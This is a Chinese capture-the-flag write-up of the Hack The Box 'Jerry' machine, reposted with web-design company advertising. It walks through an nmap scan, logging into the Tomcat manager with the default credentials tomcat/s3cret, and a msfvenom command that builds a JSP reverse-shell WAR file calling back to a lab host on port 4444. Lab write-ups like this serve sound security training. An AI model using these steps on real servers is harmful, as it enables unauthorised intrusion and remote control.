HTB的Jerry渗透测试是什么
本篇内容主要讲解“HTB的Jerry渗透测试是什么”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“HTB的Jerry渗透测试是什么”吧!
创新互联一直通过网站建设和网站营销帮助企业获得更多客户资源。 以"深度挖掘,量身打造,注重实效"的一站式服务,以成都网站设计、成都网站建设、移动互联产品、营销型网站建设服务为核心业务。10多年网站制作的经验,使用新网站建设技术,全新开发出的标准网站,不但价格便宜而且实用、灵活,特别适合中小公司网站制作。网站管理系统简单易用,维护方便,您可以完全操作网站资料,是中小公司快速网站建设的选择。
基础信息
简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/144
描述:
前言
本次演练使用kali系统按照渗透测试的过程进行操作,通过nmap发现端口开放了tomcat8080端口,使用密码登录tomcat,使用msfvenom 生成war文件上传到tomcat中,通过反弹获取shell。
一、信息收集
1、靶机ip
IP地址为:10.10.10.95
2、靶机端口与服务
nmap -sV -sS -T4 -O -A 10.10.10.95
PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
3、网站信息收集
查看8080端口
通过dirsearch进行目录扫描获取网站目录
这里我列出了部分需要的目录
/host-manager/html /manager/html /manager/
二、漏洞探测与利用
1、生成木马文件
进入/host-manager/html目录发现需要账号密码
点击取消后,再返回界面发现账号与密码
username="tomcat"
password="s3cret"
使用该密码进行登录,返回403页面无法正常进行登录
最后在/manager/目录下成功登录
发现可以上传war格式文件
使用msfvenom生成shell文件
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war
2、使用msf获取shell
首先设置好msf,使用msf监听4444端口获取反弹的shell
在登陆页面上传war文件
上传成功后点击shell
成功获取到shell
三、提权
使用这种方式所获取的直接是authority权限可直接查看root.txt
进入 \Users\Administrator\Desktop目录发现没有root.txt但是存在flags
进入flags目录使用type命令查看2 for the price of 1.txt文件
获取到root.txt与user.txt
到此,相信大家对“HTB的Jerry渗透测试是什么”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
名称栏目:HTB的Jerry渗透测试是什么
网页路径:http://pwwzsj.com/article/ieehsj.html